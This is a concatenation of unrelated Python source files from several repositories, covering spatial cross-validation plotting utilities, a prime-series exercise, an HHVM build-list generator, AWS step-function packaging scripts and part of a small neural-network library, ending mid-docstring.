#### File: jjepsuomi/LPO-SCV/utils.py
```python
import numpy as np
import sklearn.metrics.pairwise as pw
import matplotlib.pyplot as plt
import random
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
--- CALCULATION OF LEAVE-PAIR-OUT FOLDS ---
DESCRIPTION:
- This function will produce fold set for leave-pair-out cross-validation
INPUT:
'Ydata': a n-by-1 matrix of output values
'neg_samples': integer specifying the number of data points with 'negative'
label. This function is needed by the LPO-SCV method.
OUTPUT:
'lpo_folds': list of leave-pair-out folds
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def lpo_folds(Ydata, neg_samples):
posind = np.where(Ydata>0)[0]
negind = np.where(Ydata==0)[0]
lpo_folds = []
for i in posind:
negsample = random.sample(list(negind), neg_samples)
for j in range(neg_samples):
fold = [i, negsample[j]]
lpo_folds.append(fold)
return lpo_folds
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
--- USED FOR CALCULATING SORTED DISTANCE MATRIX ---
DESCRIPTION:
- This function will calculate all pairwise geographical distances between
the data points and returns a sorted matrix consisting from the distances
and additional matrix containing corresponding data point indices. This
function is needed by the SKCV method.
INPUT:
'coordinates': a n-by-2 array consisting from data point coordinates
OUTPUT:
'data_distances': a sorted n-by-n matrix containing all pairwise distances
'data_distance_indexes': a corresponding n-by-n matrix of data point indexes
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def distanceMatrix(coordinates):
number_of_data_points = coordinates.shape[0]
data_distances = np.float32(pw.euclidean_distances(coordinates, coordinates))
data_distance_indexes = np.int32(np.zeros([number_of_data_points, number_of_data_points], dtype=np.int))
index_m = np.array(range(0, number_of_data_points, 1))
for i in range(0, number_of_data_points):
sorted_m = np.transpose(np.array([data_distances[:,i], index_m]))
sorted_m = sorted_m[sorted_m[:, 0].argsort()]
data_distances[:,i] = sorted_m[:,0]
data_distance_indexes[:,i] = sorted_m[:,1]
return data_distances, data_distance_indexes
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
--- USED FOR CALCULATING DEAD ZONE FOLDS FOR A GIVEN RADIUS r ---
DESCRIPTION:
- This function will produce dead zone folds used in SKCV given some radius
r by including into the provided previosuly calculated folds the indices of
data points which are "too close" (distance <= r) to the test data points.
These folds are used when forming the reduced training data sets. Reduced
in the sense that they do not contain data points too near to test points
INPUT:
'r': dead zone radius
'folds': array of cross-validation folds to be updated
'data_distances': n-by-n matrix of pairwise distances
'data_distance_indexes': corresponding matrix of indices to previous input
OUTPUT:
'dz_folds': updated array of 'folds' that includes data points too close to
test data points
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def dzfolds(r, folds, data_distances, data_distance_indexes):
dz_folds = list()
# We loop through every previously calculated fold
for fold in folds:
tooCloseList = list()
# Find data points too close to test data points
for i in fold:
closeInds = np.where(data_distances[:,i] <= r)[0]
tooCloseList = list(set(tooCloseList).union(data_distance_indexes[closeInds,i]))
dzfold = fold[:]
# In addition to test data points, include into dzfold the indices of "too close" data
for j in tooCloseList:
if j not in dzfold:
dzfold.append(j)
dz_folds.append(dzfold)
return dz_folds
"""""""""""""""""""""""""""""""""""""""
--- VISUALIZATION OF SKCV PROCEDURE ---
"""""""""""""""""""""""""""""""""""""""
def visualize_skcv(coords, testcoords, dzcoords, r):
plt.figure(0)
mngr = plt.get_current_fig_manager()
mngr.window.wm_geometry("+0+0")
plt.clf()
plt.scatter(coords[:,0], coords[:,1], c='purple')
for t in range(0, testcoords.shape[0]):
circle1=plt.Circle((testcoords[t,0], testcoords[t,1]), r, color='orange', fill=True, alpha=0.2)
fig = plt.gcf()
fig.gca().add_artist(circle1)
plt.scatter(dzcoords[:,0], dzcoords[:,1], c='yellow')
plt.scatter(testcoords[:,0], testcoords[:,1], c='red')
plt.xlabel("EUREF-TM35FIN E")
plt.ylabel("EUREF-TM35FIN N")
plt.legend(['Training data', 'Omitted data', 'Test data'])
plt.title("SKCV PROCEDURE")
plt.axis('equal')
ax = plt.gca()
ax.set_facecolor('black')
plt.draw()
plt.pause(0.1)
""""""""""""""""""""""""""""""""""""""""
--- PLOT AND SAVE SKCV RESULTS ---
"""""""""""""""""""""""""""""""""""""""
def plotRes_skcv(performanceTable, ind, nfolds, method):
plt.figure(1)
mngr = plt.get_current_fig_manager()
window = plt.get_current_fig_manager().window
screen_x, screen_y = window.wm_maxsize()
mngr.window.wm_geometry("+"+str(int(screen_x/float(2)))+"+0")
plt.clf()
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], c='blue')
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], 'go')
plt.grid()
pcal = np.around(ind/float(performanceTable.shape[0]-1)*100, 1)
plt.title(str(nfolds) + "-fold SKCV C-index performance graph (" + str(method) + ")")
plt.xlabel("Dead zone radius (meters)")
plt.ylabel("C-index")
plt.draw()
plt.pause(0.1)
if pcal == 100:
plt.savefig(str(nfolds) + '_Fold_SKCV_Results_' + method + '.pdf')
"""""""""""""""""""""""""""""""""""""""""""""
--- VISUALIZATION OF LPO-SCV PROCEDURE ---
"""""""""""""""""""""""""""""""""""""""""""""
def visualize_lposcv(coords, testcoords, dzcoords, r):
plt.figure(0)
mngr = plt.get_current_fig_manager()
mngr.window.wm_geometry("+0+0")
plt.clf()
plt.scatter(coords[:,0], coords[:,1], c='purple')
circle1=plt.Circle((testcoords[0,0], testcoords[0,1]), r, color='orange', fill=True, alpha=0.2)
circle2=plt.Circle((testcoords[1,0], testcoords[1,1]), r, color='orange', fill=True, alpha=0.2)
fig = plt.gcf()
fig.gca().add_artist(circle1)
fig.gca().add_artist(circle2)
plt.scatter(dzcoords[:,0], dzcoords[:,1], c='yellow')
plt.scatter(testcoords[0,0], testcoords[0,1], c='red')
plt.scatter(testcoords[1,0], testcoords[1,1], c='blue')
plt.title("LPO-SCV PROCEDURE")
plt.xlabel("EUREF-TM35FIN E")
plt.ylabel("EUREF-TM35FIN N")
plt.legend(['Training data', 'Omitted data', 'Test (+) data', 'Test (-) data'])
plt.axis('equal')
ax = plt.gca()
ax.set_facecolor('black')
plt.draw()
plt.pause(0.1)
""""""""""""""""""""""""""""""""""""""""
--- PLOT AND SAVE LPO-SCV RESULTS ---
"""""""""""""""""""""""""""""""""""""""
def plotRes_lposcv(performanceTable, ind, nfolds, method):
plt.figure(1)
mngr = plt.get_current_fig_manager()
window = plt.get_current_fig_manager().window
screen_x, screen_y = window.wm_maxsize()
mngr.window.wm_geometry("+"+str(int(screen_x/float(2)))+"+0")
plt.clf()
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], c='blue')
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], 'go')
plt.grid()
pcal = np.around(ind/float(performanceTable.shape[0]-1)*100, 1)
plt.title(str(nfolds) + "-fold LPO-SCV C-index performance graph (" + str(method) + ")")
plt.xlabel("Dead zone radius (meters)")
plt.ylabel("AUC")
plt.draw()
plt.pause(0.1)
if pcal == 100:
plt.savefig(str(nfolds) + '_Fold_LPO-SCV_Results_' + method + '.pdf')
``` |
{
"source": "jjerazo3/Proyecto-Bimestral",
"score": 4
} |
#### File: jjerazo3/Proyecto-Bimestral/serie primos (1).py
```python
def SeriePrimos(limite1):
n = 0
d = 3
divisor = 1
suma = 0
primo = 0
estado = False
for k in range(1, limite1 + 1):
n = n + 1
while not estado:
for i in range(1, primo + 1):
if primo % i == 0:
divisor += 1
if divisor == 2:
d = primo
primo += 1
estado = True
else:
primo = primo + 1
estado = False
divisor = 0
if k % 2 == 0:
suma = suma - (n / d)
print(f' - {n} / {d}', end=" ")
else:
suma = suma + (n / d)
if k == 1:
print(f'{n} / {d}', end=" ")
else:
print(f' + {n} / {d}', end=" ")
estado = False
return suma
limite1 = int(input("Ingrese un límite:"))
print(' = ', SeriePrimos(limite1))
# In[ ]:
``` |
{
"source": "jjergus/hhvm",
"score": 3
} |
#### File: hphp/system/php_bzl.py
```python
import sys
import os.path
def _read_file_and_gen_bzl(path: str) -> str:
r = ""
r += f"# This file is {'@'}generated from `php.txt`.\n"
r += "# Do not edit manually, run `python3 hphp/system/php_bzl.py` instead.\n"
r += "SYSTEMLIB_SRCS = [\n"
with open(path) as f:
for line in f.readlines():
line = line.strip()
if not line or line.startswith("#"):
continue
r += f" \"{line}\",\n"
r += "]\n"
return r
def _generate():
php_txt = os.path.dirname(__file__) + "/php.txt"
php_bzl = os.path.dirname(__file__) + "/php.bzl"
contents = _read_file_and_gen_bzl(php_txt)
with open(php_bzl, mode="w") as f:
f.write(contents)
def _verify(php_txt: str, php_bzl: str):
with open(php_bzl, mode="rb") as f:
expected = f.read()
assert isinstance(expected, bytes)
actual = _read_file_and_gen_bzl(php_txt)
actual = bytes(actual, "utf-8")
assert expected == actual, "file need to be regenerated"
if __name__ == "__main__":
if len(sys.argv) == 1:
# This is to be invoked manually when `php.txt` changes
_generate()
elif sys.argv[1] == "verify":
# This is invoked as Buck test
[php_txt, php_bzl] = sys.argv[2:]
_verify(php_txt, php_bzl)
else:
raise Exception("unknown mode")
``` |
{
"source": "jjergus/packaging",
"score": 2
} |
#### File: aws/hhvm1/execution_status.py
```python
import json
import sys
from lambdas.common import all_execution_events
if len(sys.argv) < 2:
print('Usage: %s <execution-arn>' % sys.argv[0])
quit(1)
events = {e['id']: e for e in all_execution_events(sys.argv[1])}
finished = {}
for finished_event in events.values():
if finished_event['type'] == 'TaskStateExited':
started_event = finished_event
while started_event['type'] != 'TaskStateEntered':
started_event = events[started_event['previousEventId']]
finished[started_event['id']] = started_event, finished_event
unfinished = {
id: e for id, e in events.items()
if id not in finished and e['type'] == 'TaskStateEntered'
}
def output(s, f, prev):
details = s['stateEnteredEventDetails']
name = details['name']
if name == 'HealthCheck' or name.startswith('PrepareTo'):
return
out = [name]
input = json.loads(details['input'])
if type(input) == dict:
out.append(input.get('version'))
out.append(input.get('platform'))
if f:
timedelta = f['timestamp'] - s['timestamp']
out.append('(' + str(timedelta).rstrip('0') + ')')
prefix = ''
if prev:
if prev['type'].endswith('Succeeded'):
prefix = '\033[32m'
elif prev['type'].endswith('Failed'):
prefix = '\033[31mFAILED: '
print(' ' + prefix + ' '.join(o for o in out if o) + '\033[0m')
if finished:
print('Finished tasks:')
for s, f in finished.values():
output(s, f, events[f['previousEventId']])
print()
if unfinished:
print('Unfinished tasks:')
for s in unfinished.values():
output(s, None, None)
print()
```
#### File: hhvm1/lambdas/parse_input.py
```python
from datetime import date
import re
from activities import Activity, BuildAndPublishMacOS, MakeBinaryPackage
from common import is_binary_platform
def lambda_handler(event, context=None):
available_activities = {c.__name__ for c in Activity.__subclasses__()}
versions = []
platforms = []
activities = []
debug = ''
for part in parts(event):
if part in ['skip_ec2', 'skip-ec2', '--skip-ec2']:
debug = 'skip_ec2'
elif part in ['fake_ec2', 'fake-ec2', '--fake-ec2']:
debug = 'fake_ec2'
elif part in ['test', 'test_build', 'test-build', '--test', '--test-build']:
debug = 'test_build'
elif part in available_activities:
activities += [part]
elif re.fullmatch(r'[0-9]+\.[0-9]+\.[0-9]+', part):
versions += [part]
elif is_binary_platform(part):
platforms += [part]
if debug == 'test_build':
available_activities = [
MakeBinaryPackage.__name__,
BuildAndPublishMacOS.__name__,
]
for a in activities:
if a not in available_activities:
raise Exception(a + ' is not a valid test build step')
if not activities:
activities = available_activities
if not versions:
versions = [date.today().strftime('%Y.%m.%d')]
return {
'buildInput': {
'versions': versions,
'platforms': platforms,
'activities': activities,
'debug': debug,
}
}
def parts(input):
if type(input) in [list, dict]:
if type(input) == dict:
input = input.values()
return [part for item in input for part in parts(item)]
return str(input).split(' ')
``` |
{
"source": "jjerhot/ALPINIST",
"score": 2
} |
#### File: ALPINIST/ALP_rescale/alp_2mu_rescale.py
```python
import numpy as np
from scipy.interpolate import RectBivariateSpline, interp1d
from os import path
import mpmath as mp
import alp_setup as setup
import alp_constants as c
import decay_widths as width
import argparse
# Derived from load_data.py for cross-check of B meson mode with 2mu decay
parser = argparse.ArgumentParser(description='ALP MC rescaling for C_ff coupling. \n Select the experiment')
parser.add_argument("-e","--exp", required="", type=str, help="Experiments available (case sensitive): exp = NA62 | CHARM | nuCAL | SHiP | DarkQuest | DUNE | SHADOWS. If not specified, running over all experiments available.")
parser.add_argument("-l","--lambda", dest="lam", default=1000, type=float, help="The \u039B [GeV] energy scale. Default value is \u039B = 1000 GeV")
args = parser.parse_args()
#experiment:
if args.exp == "":
print("Running for all experiments available")
experiments = setup.experiments
elif args.exp in setup.experiments:
print("Running for ", args.exp, " experiment")
experiments = [args.exp]
else:
parser.error("Experiment " + args.exp + " not available. Experiments available: exp = NA62 | CHARM | nuCAL | SHiP | DarkQuest | DUNE | SHADOWS. If not specified, running over all experiments available.")
#scale
if args.lam <= 0:
parser.error("\u039B has to be a positive number.")
channels_decay = ['2Mu']
channels_production = ['BmesonK','BmesonKstar']
reference_couplings = {'BmesonK': 1e-10,
'BmesonKstar': 1e-10}
scaling_exponent = {'BmesonK': 1,
'BmesonKstar': 1}
coupling_production = {}
processed = 0.
constraint_dictionary = {}
boundary_dictionary = {}
#total decay width interpolation - only used for hadronic channels. Turned on for m_a > 300 MeV
total_width_digitized = np.loadtxt(path.dirname(path.realpath(__file__))+'/../widths/2mu_integrated/TotalWidth_gY1e-4.dat')
m_a_tot_steps = 1416
m_a_tot_list = np.array([total_width_digitized[i,0] for i in range(m_a_tot_steps)])
Gamma_a_tot_list = np.array([total_width_digitized[i,1] for i in range(m_a_tot_steps)])
Gamma_a_tot_inter = interp1d(m_a_tot_list, Gamma_a_tot_list)
for exp in experiments:
for chan_prod in channels_production:
filename_dat = path.dirname(path.realpath(__file__))+"/../tab_decay/"+exp+"/"+exp+'_'+chan_prod+'_2mu'+'.dat'
if path.exists(filename_dat):
experimental_constraint_data_dat = np.loadtxt(filename_dat)
experimental_constraint_data = np.delete(experimental_constraint_data_dat.reshape((201,101,3)),100,0)
# Extract the boundaries of the tabulated grid
boundary_dictionary[exp+'_'+chan_prod] = np.array([[experimental_constraint_data[0,0,0],experimental_constraint_data[-1,0,0]],[experimental_constraint_data[0,0,1],experimental_constraint_data[0,-1,1]]])
# Add a small number to avoid taking the logarithm of zero
experimental_constraint_data = experimental_constraint_data[:,:,:] + [0,0,c.epsilon]
# Take logarithm to make interpolation easier
experimental_constraint_data = np.log(experimental_constraint_data)
# Fast interpolation on rectangular grid
experimental_constraint_data_inter = RectBivariateSpline(experimental_constraint_data[:,0,0],experimental_constraint_data[0,:,1],experimental_constraint_data[:,:,2])
constraint_dictionary[exp+'_'+chan_prod] = experimental_constraint_data_inter
else:
print(filename_dat,' not found')
# If no file exists, we define the boundaries in such a way that the channel will be skipped in the calculations below
boundary_dictionary[exp+'_'+chan_prod] = np.array([[0, -1],[0,-1]])
def ALP_decays_single_channel(experiment, production_channel, m_a, Gamma_a):
boundary = boundary_dictionary[experiment+'_'+production_channel]
# Check if the requested value of m_a and Gamma_a lie within the tabulated range. Otherwise return zero.
if boundary[0,0] <= m_a <= boundary[0,1] and boundary[1,0] <= Gamma_a <= boundary[1,1]:
return (coupling_production[production_channel] / reference_couplings[production_channel])**scaling_exponent[production_channel] * (np.exp(constraint_dictionary[experiment+'_'+production_channel](np.log(m_a),np.log(Gamma_a))[0,0]) - c.epsilon)
else:
return 0
# Model-independent part
def ALP_events(experiment, m_a, g_Y):
Gamma_a = (g_Y*np.power(10,4))**2*np.power(10,Gamma_a_tot_inter(np.log10(m_a)))
number_of_decays = np.sum([ALP_decays_single_channel(experiment, channels_production[i], m_a, Gamma_a) for i in range(len(channels_production))])
Gamma_mumu = width.a_2Mu(m_a, g_Y/c.v)
BR_mumu = Gamma_mumu/Gamma_a
if BR_mumu > 1.:
BR_mumu = 1
if BR_mumu < 0.:
BR_mumu = 0
return number_of_decays * BR_mumu
def ALP_events_EFT(experiment, m_a, g_Y, Lambda):
global processed
processed += 1./48000
print("\r" + " processed: " + "{:.2f}".format(processed*100) + "%", end=" ")
#define B decay branching fraction
V_qb = [c.V_ub, c.V_cb, c.V_tb]
V_qs = [c.V_us, c.V_cs, c.V_ts]
h_bs = c.alpha_EM*g_Y*c.m_q[5]**2/(4*np.pi*c.m_W**2*mp.sin(c.theta_w)**2*c.v) * np.log(Lambda**2/c.m_q[5]**2) * sum([np.prod(q) for q in zip(V_qb, V_qs)])
BR_B_K_a = width.B_K_a(m_a,h_bs) / c.Gamma_B
BR_B_Kstar_a = width.B_Kstar_a(m_a,h_bs) / c.Gamma_B
global coupling_production
coupling_production = { 'BmesonK': BR_B_K_a,
'BmesonKstar': BR_B_Kstar_a}
return ALP_events(experiment, m_a, g_Y)
def ALP_events_exp(expName, Lambda):
# make lists of masses (2*E-1 to ~2*E+0) and couplings (E-6 to E-2)
global processed
processed = 0.
g_a_list = [ 10**(exponent/100-1) for exponent in range(-500,-100)]
m_a_list = [ 2*10**(exponent/100-1) for exponent in range(0,120)]
data_list_gY = [[ [m_a, g_Y, ALP_events_EFT(expName, m_a, g_Y, Lambda)] for g_Y in g_a_list] for m_a in m_a_list]
data_gY = np.reshape(data_list_gY,(len(m_a_list)*len(g_a_list),3))
# export
output_dir = path.dirname(path.realpath(__file__))+'/../tab_toPlot/'
outPath = output_dir + expName + '/'
outfileName = expName + '_gY.dat'
np.savetxt(outPath + outfileName,data_gY)
print('file ' + outfileName + ' saved to ' + outPath)
return
for exp in experiments:
ALP_events_exp(exp,args.lam)
``` |
{
"source": "jjermanis/pc-py",
"score": 4
} |
#### File: jjermanis/pc-py/challenge02.py
```python
from common import show_def_result, text_from_file
def main():
# Find the rare characters "in the mess" from the HTML source... I stored "the mess" in a file.
raw_data = text_from_file("challenge02text.txt")
# Get frequency of each character
histogram = {}
for c in raw_data:
histogram[c] = histogram.get(c, 0) + 1
# Get the "rare" characters. What does "rare" mean? In this case, it turns out "rare" means unique.
# But checking for any relatively small number gets the right answer
result = ''.join(c for c in raw_data if histogram[c] < 5)
show_def_result(result)
if __name__ == "__main__":
main()
```
#### File: jjermanis/pc-py/challenge10.py
```python
from common import show_return_result
def main():
# Continue the pattern. Each term is a description of the previous.
# 21 => 1211, because 21 is one 2 and one 1.
curr_term = "1"
next_term = ""
for _ in range(30):
char_index = 0
ahead_index = 0
while char_index < len(curr_term):
while ahead_index < len(curr_term) and curr_term[ahead_index] == curr_term[char_index]:
ahead_index += 1
next_term += str(ahead_index - char_index) + curr_term[char_index]
char_index = ahead_index
curr_term = next_term
next_term = ''
show_return_result(len(curr_term))
if __name__ == "__main__":
main()
```
#### File: jjermanis/pc-py/challenge23.py
```python
import this
import codecs
from re import search
from common import show_hex_result
def hint():
print(codecs.encode("va gur snpr bs jung?", "rot_13"))
def main():
hint()
zen = codecs.encode(this.s, "rot_13")
answer = search("the face of ([a-z]+)", zen).group(1)
print()
show_hex_result(answer)
if __name__ == "__main__":
main()
``` |
{
"source": "jjerphan/dirty_cat",
"score": 2
} |
#### File: dirty_cat/test/test_super_vectorizer.py
```python
import pytest
import sklearn
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.utils.validation import check_is_fitted
from sklearn.exceptions import NotFittedError
from distutils.version import LooseVersion
from dirty_cat import SuperVectorizer
from dirty_cat import GapEncoder
def check_same_transformers(expected_transformers: dict, actual_transformers: list):
# Construct the dict from the actual transformers
actual_transformers_dict = dict([(name, cols) for name, trans, cols in actual_transformers])
assert actual_transformers_dict == expected_transformers
def _get_dataframe():
return pd.DataFrame({
'int': pd.Series([15, 56, 63, 12, 44], dtype=int),
'float': pd.Series([5.2, 2.4, 6.2, 10.45, 9.], dtype=float),
'str1': pd.Series(['public', 'private', 'private', 'private', 'public'], dtype='string'),
'str2': pd.Series(['officer', 'manager', 'lawyer', 'chef', 'teacher'], dtype='string'),
'cat1': pd.Series(['yes', 'yes', 'no', 'yes', 'no'], dtype='category'),
'cat2': pd.Series(['20K+', '40K+', '60K+', '30K+', '50K+'], dtype='category'),
})
def test_super_vectorizer():
# Create a simple DataFrame
X = _get_dataframe()
# Test with low cardinality and a StandardScaler for the numeric columns
vectorizer_base = SuperVectorizer(
cardinality_threshold=3,
# we must have n_samples = 5 >= n_components
high_card_str_transformer=GapEncoder(n_components=2),
high_card_cat_transformer=GapEncoder(n_components=2),
numerical_transformer=StandardScaler(),
)
# Warning: order-dependant
expected_transformers_df = {
'numeric': ['int', 'float'],
'low_card_str': ['str1'],
'high_card_str': ['str2'],
'low_card_cat': ['cat1'],
'high_card_cat': ['cat2'],
}
vectorizer_base.fit_transform(X)
check_same_transformers(expected_transformers_df, vectorizer_base.transformers)
# Test with higher cardinality threshold and no numeric transformer
vectorizer_default = SuperVectorizer() # Using default values
expected_transformers_2 = {
'low_card_str': ['str1', 'str2'],
'low_card_cat': ['cat1', 'cat2'],
}
vectorizer_default.fit_transform(X)
check_same_transformers(expected_transformers_2, vectorizer_default.transformers)
# Test with a numpy array
arr = X.to_numpy()
# Instead of the columns names, we'll have the column indices.
expected_transformers_np = {
'numeric': [0, 1],
'low_card_str': [2, 4],
'high_card_str': [3, 5],
}
vectorizer_base.fit_transform(arr)
check_same_transformers(expected_transformers_np, vectorizer_base.transformers)
# Test with pandas series
expected_transformers_series = {
'low_card_cat': ['cat1'],
}
vectorizer_base.fit_transform(X['cat1'])
check_same_transformers(expected_transformers_series, vectorizer_base.transformers)
# Test casting values
vectorizer_cast = SuperVectorizer(
cardinality_threshold=3,
# we must have n_samples = 5 >= n_components
high_card_str_transformer=GapEncoder(n_components=2),
high_card_cat_transformer=GapEncoder(n_components=2),
numerical_transformer=StandardScaler(),
)
X_str = X.astype('object')
expected_transformers_plain = {
'high_card_str': ['str2', 'cat2'],
'low_card_str': ['str1', 'cat1'],
'numeric': ['int', 'float']
}
# With pandas
vectorizer_cast.fit_transform(X_str)
check_same_transformers(expected_transformers_plain, vectorizer_cast.transformers)
# With numpy
vectorizer_cast.fit_transform(X_str.to_numpy())
check_same_transformers(expected_transformers_np, vectorizer_cast.transformers)
def test_get_feature_names():
X = _get_dataframe()
vectorizer_w_pass = SuperVectorizer(remainder='passthrough')
vectorizer_w_pass.fit(X)
if LooseVersion(sklearn.__version__) < LooseVersion('0.23'):
with pytest.raises(NotImplementedError):
# Prior to sklearn 0.23, ColumnTransformer.get_feature_names
# with "passthrough" transformer(s) raises a NotImplementedError
assert vectorizer_w_pass.get_feature_names()
else:
expected_feature_names_pass = [ # Order matters. If it doesn't, convert to set.
'str1_private', 'str1_public',
'str2_chef', 'str2_lawyer', 'str2_manager', 'str2_officer', 'str2_teacher',
'cat1_no', 'cat1_yes', 'cat2_20K+', 'cat2_30K+', 'cat2_40K+', 'cat2_50K+', 'cat2_60K+',
'int', 'float'
]
assert vectorizer_w_pass.get_feature_names() == expected_feature_names_pass
vectorizer_w_drop = SuperVectorizer(remainder='drop')
vectorizer_w_drop.fit(X)
expected_feature_names_drop = [ # Order matters. If it doesn't, convert to set.
'str1_private', 'str1_public',
'str2_chef', 'str2_lawyer', 'str2_manager', 'str2_officer', 'str2_teacher',
'cat1_no', 'cat1_yes', 'cat2_20K+', 'cat2_30K+', 'cat2_40K+', 'cat2_50K+', 'cat2_60K+'
]
assert vectorizer_w_drop.get_feature_names() == expected_feature_names_drop
def test_fit():
# Simply checks sklearn's `check_is_fitted` function raises an error if
# the SuperVectorizer is instantiated but not fitted.
# See GH#193
sup_vec = SuperVectorizer()
with pytest.raises(NotFittedError):
if LooseVersion(sklearn.__version__) >= LooseVersion('0.22'):
assert check_is_fitted(sup_vec)
else:
assert check_is_fitted(sup_vec, attributes=dir(sup_vec))
if __name__ == '__main__':
print('start test_super_vectorizer')
test_super_vectorizer()
print('test_super_vectorizer passed')
print('start test_get_feature_names')
test_get_feature_names()
print('test_get_feature_names passed')
print('start test_fit')
test_fit()
print('test_fit passed')
print('Done')
``` |
{
"source": "jjerphan/distributed",
"score": 2
} |
#### File: distributed/distributed/node.py
```python
from __future__ import print_function, division, absolute_import
import warnings
from tornado.ioloop import IOLoop
from .compatibility import unicode
from .core import Server, ConnectionPool
from .versions import get_versions
class Node(object):
"""
Base class for nodes in a distributed cluster.
"""
def __init__(
self,
connection_limit=512,
deserialize=True,
connection_args=None,
io_loop=None,
serializers=None,
deserializers=None,
timeout=None,
):
self.io_loop = io_loop or IOLoop.current()
self.rpc = ConnectionPool(
limit=connection_limit,
deserialize=deserialize,
serializers=serializers,
deserializers=deserializers,
connection_args=connection_args,
timeout=timeout,
server=self,
)
class ServerNode(Node, Server):
"""
Base class for server nodes in a distributed cluster.
"""
# TODO factor out security, listening, services, etc. here
# XXX avoid inheriting from Server? there is some large potential for confusion
# between base and derived attribute namespaces...
def __init__(
self,
handlers=None,
blocked_handlers=None,
stream_handlers=None,
connection_limit=512,
deserialize=True,
connection_args=None,
io_loop=None,
serializers=None,
deserializers=None,
timeout=None,
):
Node.__init__(
self,
deserialize=deserialize,
connection_limit=connection_limit,
connection_args=connection_args,
io_loop=io_loop,
serializers=serializers,
deserializers=deserializers,
timeout=timeout,
)
Server.__init__(
self,
handlers=handlers,
blocked_handlers=blocked_handlers,
stream_handlers=stream_handlers,
connection_limit=connection_limit,
deserialize=deserialize,
io_loop=self.io_loop,
)
def versions(self, comm=None, packages=None):
return get_versions(packages=packages)
def start_services(self, default_listen_ip):
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
for k, v in self.service_specs.items():
listen_ip = None
if isinstance(k, tuple):
k, port = k
else:
port = 0
if isinstance(port, (str, unicode)):
port = port.split(":")
if isinstance(port, (tuple, list)):
if len(port) == 2:
listen_ip, port = (port[0], int(port[1]))
elif len(port) == 1:
[listen_ip], port = port, 0
else:
raise ValueError(port)
if isinstance(v, tuple):
v, kwargs = v
else:
kwargs = {}
try:
service = v(self, io_loop=self.loop, **kwargs)
service.listen(
(listen_ip if listen_ip is not None else default_listen_ip, port)
)
self.services[k] = service
except Exception as e:
warnings.warn(
"\nCould not launch service '%s' on port %s. " % (k, port)
+ "Got the following message:\n\n"
+ str(e),
stacklevel=3,
)
def stop_services(self):
for service in self.services.values():
service.stop()
@property
def service_ports(self):
return {k: v.port for k, v in self.services.items()}
``` |
{
"source": "jjerphan/joml",
"score": 3
} |
#### File: joml/examples/simple_benchmark.py
```python
from time import strftime, gmtime
import numpy as np
import os
from joml.network import Network
from joml.layer import Layer, SoftMaxCrossEntropyOutputLayer
from joml.functions import ReLu
from joml.utils import one_hot
np.random.seed(1337)
def load_sets(folder, dtype=np.float32, delimiter=","):
print(f"Loading dataset from {folder}")
x_train = np.loadtxt(os.path.join(folder, "x_train.csv"), dtype=dtype, delimiter=delimiter)
y_train = np.loadtxt(os.path.join(folder, "y_train.csv"), dtype=dtype, delimiter=delimiter)
x_test = np.loadtxt(os.path.join(folder, "x_test.csv"), dtype=dtype, delimiter=delimiter)
y_test = np.loadtxt(os.path.join(folder, "y_test.csv"), dtype=dtype, delimiter=delimiter)
x_train = x_train.T
x_test = x_test.T
# Conversion to integers
y_train = y_train.astype(int)
y_test = y_test.astype(int)
return x_train, y_train, x_test, y_test
if __name__ == "__main__":
# Loading data
data_folder = "../data" # set your own value
x_train, y_train, x_test, y_test = load_sets(data_folder)
y_train = one_hot(y_train)
y_test = one_hot(y_test)
# Defining the network
network = Network(input_size=14, name="14-100-40-4 Arch")
network.stack(Layer(size=100, activation_function=ReLu()))
network.stack(Layer(size=40, activation_function=ReLu()))
network.output(SoftMaxCrossEntropyOutputLayer(size=4))
# Printing information
print(network)
# Defining a log file
current_datetime = strftime("%Y-%m-%d-%H:%M:%S", gmtime())
logs_folder = os.path.join("..", "logs")
out_file = os.path.join(logs_folder, f"benchmark_{network.name}-{current_datetime}.csv")
# Benchmarking the network
logger = network.benchmark(x_train, y_train, x_test, y_test, csv_file_name=out_file,
num_epochs=10)
# Dumping results in a CSV file
logger.dump_results()
logger.plot_benchmark()
```
#### File: joml/joml/functions.py
```python
import numpy as np
class ActivationFunction:
"""
`ActivationFunction` are used in `Layer` to perform a non-linear mapping.
`ActivationFunction` define the value they return based on a input.
They also define the value of their derivative.
"""
def __init__(self, value, derivative):
self._value = value
self._derivative = derivative
def value(self, x_array):
return np.apply_along_axis(self._value, axis=0, arr=x_array)
def der(self, x_array):
return np.apply_along_axis(self._derivative, axis=0, arr=x_array)
class ReLu(ActivationFunction):
@staticmethod
def _relu_value(x_array): return x_array.clip(0.0)
@staticmethod
def _relu_derivative(x_array): return 1. * (x_array.clip(0.0) != 0.0)
def __init__(self):
value = ReLu._relu_value
derivative = ReLu._relu_derivative
super().__init__(value, derivative)
def __str__(self):
return "ReLu"
class SoftMax(ActivationFunction):
@staticmethod
def _softmax_value(x_array):
C = np.max(x_array)
shifted = x_array - C
exps = np.exp(shifted)
return exps / np.sum(exps)
@staticmethod
def _softmax_derivative(x_array):
x_array_vert = x_array.reshape(-1, 1)
return np.diagflat(x_array_vert) - np.dot(x_array_vert, x_array_vert.T)
def __init__(self):
value = SoftMax._softmax_value
derivative = SoftMax._softmax_derivative
super().__init__(value, derivative)
def __str__(self):
return "Softmax"
class Identity(ActivationFunction):
@staticmethod
def _identity_value(x_array): return x_array
@staticmethod
def _identity_derivative(x_array): return (0 * x_array) + 1.0
def __init__(self):
value = Identity._identity_value
derivative = Identity._identity_derivative
super().__init__(value, derivative)
def __str__(self):
return "Identity"
```
#### File: joml/joml/network.py
```python
import numpy as np
import warnings
from joml.layer import Layer, SoftMaxCrossEntropyOutputLayer
from joml.logger import StdOutLogger, Logger, BenchmarkLogger
from joml.utils import one_hot
class Network:
"""
A `Network` is a collections of `Layers` that learns a mapping
from an input space to an output space.
